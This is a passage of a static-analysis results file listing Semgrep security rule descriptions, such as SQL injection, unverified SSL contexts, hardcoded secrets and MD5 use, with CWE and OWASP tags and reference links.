exposure.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.missing-internal.missing-internal)\n - [https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md](https://github.com/yandex/gixy/blob/master/docs/en/plugins/ssrf.md)\n - [https://nginx.org/en/docs/http/ngx_http_core_module.html#internal](https://nginx.org/en/docs/http/ngx_http_core_module.html#internal)\n","text":"This location block contains a 'proxy_pass' directive but does not contain the 'internal' directive. The 'internal' directive restricts access to this location to internal requests. Without 'internal', an attacker could use your server for server-side request forgeries (SSRF). Include the 'internal' directive in this block to limit exposure."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.missing-internal.missing-internal","id":"generic.nginx.security.missing-internal.missing-internal","name":"generic.nginx.security.missing-internal.missing-internal","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.missing-internal.missing-internal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine."},"help":{"markdown":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection)\n - [https://blog.gopheracademy.com/advent-2017/go-grpc-beyond-basics/#:~:text=disables%20transport%20security](https://blog.gopheracademy.com/advent-2017/go-grpc-beyond-basics/#:~:text=disables%20transport%20security)\n","text":"Found an insecure gRPC connection. This creates a connection without encryption to a gRPC client/server. A malicious attacker could tamper with the gRPC message, which could compromise the machine."},"helpUri":"https://semgrep.dev/r/javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","id":"javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","name":"javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.grpc.security.grpc-nodejs-insecure-connection.grpc-nodejs-insecure-connection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection."},"help":{"markdown":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation)\n - [https://www.oracle.com/java/technologies/javase/tlsreadme.html](https://www.oracle.com/java/technologies/javase/tlsreadme.html)\n","text":"Checks for cases where java applications are allowing unsafe renegotiation. This leaves the application vulnerable to a man-in-the-middle attack where chosen plain text is injected as prefix to a TLS connection."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","id":"problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","name":"problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.tls-renegotiation.tls-renegotiation"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries."},"help":{"markdown":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length)\n - [https://www.securesystems.de/blog/forging_ciphertexts_under_Galois_Counter_Mode_for_the_Node_js_crypto_module/](https://www.securesystems.de/blog/forging_ciphertexts_under_Galois_Counter_Mode_for_the_Node_js_crypto_module/)\n - [https://nodejs.org/api/crypto.html#cryptocreatedecipherivalgorithm-key-iv-options](https://nodejs.org/api/crypto.html#cryptocreatedecipherivalgorithm-key-iv-options)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures/](https://owasp.org/Top10/A02_2021-Cryptographic_Failures/)\n","text":"The call to 'createDecipheriv' with the Galois Counter Mode (GCM) mode of operation is missing an expected authentication tag length. If the expected authentication tag length is not specified or otherwise checked, the application might be tricked into verifying a shorter-than-expected authentication tag. This can be abused by an attacker to spoof ciphertexts or recover the implicit authentication key of GCM, allowing arbitrary forgeries."},"helpUri":"https://semgrep.dev/r/javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","id":"javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","name":"javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length","properties":{"precision":"very-high","tags":["CWE-310: CWE CATEGORY: Cryptographic Issues","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-crypto.security.gcm-no-tag-length.gcm-no-tag-length"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead."},"help":{"markdown":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.unverified-ssl-context.unverified-ssl-context)\n - [https://docs.python.org/3/library/ssl.html#ssl-security](https://docs.python.org/3/library/ssl.html#ssl-security)\n - [https://docs.python.org/3/library/http.client.html#http.client.HTTPSConnection](https://docs.python.org/3/library/http.client.html#http.client.HTTPSConnection)\n","text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.unverified-ssl-context.unverified-ssl-context","id":"python.lang.security.unverified-ssl-context.unverified-ssl-context","name":"python.lang.security.unverified-ssl-context.unverified-ssl-context","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.unverified-ssl-context.unverified-ssl-context"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.actix.sql.postgres-taint.postgres-taint)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.actix.sql.postgres-taint.postgres-taint","id":"rust.actix.sql.postgres-taint.postgres-taint","name":"rust.actix.sql.postgres-taint.postgres-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.actix.sql.postgres-taint.postgres-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","id":"go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","name":"go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead."},"help":{"markdown":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","id":"java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","name":"java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy."},"help":{"markdown":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy)\n - [https://chainsecurity.com/heartbreaks-curve-lp-oracles/](https://chainsecurity.com/heartbreaks-curve-lp-oracles/)\n - [https://chainsecurity.com/curve-lp-oracle-manipulation-post-mortem/](https://chainsecurity.com/curve-lp-oracle-manipulation-post-mortem/)\n","text":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy."},"helpUri":"https://semgrep.dev/r/solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","id":"solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","name":"solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","id":"terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","name":"terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker"},"help":{"markdown":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal)\n - [https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall](https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall)\n","text":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker"},"helpUri":"https://semgrep.dev/r/trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","id":"trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","name":"trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used."},"help":{"markdown":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading)\n - [https://docs.angularjs.org/api/ng/service/$sce#trustAsJs](https://docs.angularjs.org/api/ng/service/$sce#trustAsJs)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","id":"javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","name":"javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner."},"help":{"markdown":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.unsafe-reflection.unsafe-reflection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.unsafe-reflection.unsafe-reflection","id":"java.lang.security.audit.unsafe-reflection.unsafe-reflection","name":"java.lang.security.audit.unsafe-reflection.unsafe-reflection","properties":{"precision":"very-high","tags":["CWE-470: Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.unsafe-reflection.unsafe-reflection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API."},"help":{"markdown":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method)\n - [https://docs.angularjs.org/api/ng/service/$sce#trustAsUrl](https://docs.angularjs.org/api/ng/service/$sce#trustAsUrl)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","id":"javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","name":"javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.postgres.hardcoded-password.hardcoded-password)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.postgres.hardcoded-password.hardcoded-password","id":"rust.secrets.postgres.hardcoded-password.hardcoded-password","name":"rust.secrets.postgres.hardcoded-password.hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.postgres.hardcoded-password.hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`."},"help":{"markdown":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.md5-used-as-password.md5-used-as-password)\n - [https://tools.ietf.org/html/rfc6151](https://tools.ietf.org/html/rfc6151)\n - [https://crypto.stackexchange.com/questions/44151/how-does-the-flame-malware-take-advantage-of-md5-collision](https://crypto.stackexchange.com/questions/44151/how-does-the-flame-malware-take-advantage-of-md5-collision)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n - [https://security.stackexchange.com/questions/211/how-to-securely-hash-passwords](https://security.stackexchange.com/questions/211/how-to-securely-hash-passwords)\n - [https://github.com/returntocorp/semgrep-rules/issues/1609](https://github.com/returntocorp/semgrep-rules/issues/1609)\n - [https://docs.python.org/3/library/hashlib.html#hashlib.scrypt](https://docs.python.org/3/library/hashlib.html#hashlib.scrypt)\n","text":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.md5-used-as-password.md5-used-as-password","id":"python.lang.security.audit.md5-used-as-password.md5-used-as-password","name":"python.lang.security.audit.md5-used-as-password.md5-used-as-password","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.md5-used-as-password.md5-used-as-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library."},"help":{"markdown":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-sql-string.tainted-sql-string)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-sql-string.tainted-sql-string","id":"php.lang.security.injection.tainted-sql-string.tainted-sql-string","name":"php.lang.security.injection.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response."},"help":{"markdown":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/credentials-exposure/](https://cloudsplaining.readthedocs.io/en/latest/glossary/credentials-exposure/)\n - [https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py)\n","text":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","id":"terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","name":"terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`"},"help":{"markdown":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli)\n - [https://sequelize.org/master/manual/raw-queries.html](https://sequelize.org/master/manual/raw-queries.html)\n","text":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`"},"helpUri":"https://semgrep.dev/r/javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","id":"javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","name":"javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request)\n - [https://docs.spring.io/spring/docs/current/javadoc-api/org/springframework/web/client/RestTemplate.html#delete-java.lang.String-java.util.Map-](https://docs.spring.io/spring/docs/current/javadoc-api/org/springframework/web/client/RestTemplate.html#delete-java.lang.String-java.util.Map-)\n - [https://www.baeldung.com/rest-template](https://www.baeldung.com/rest-template)\n","text":"Checks for 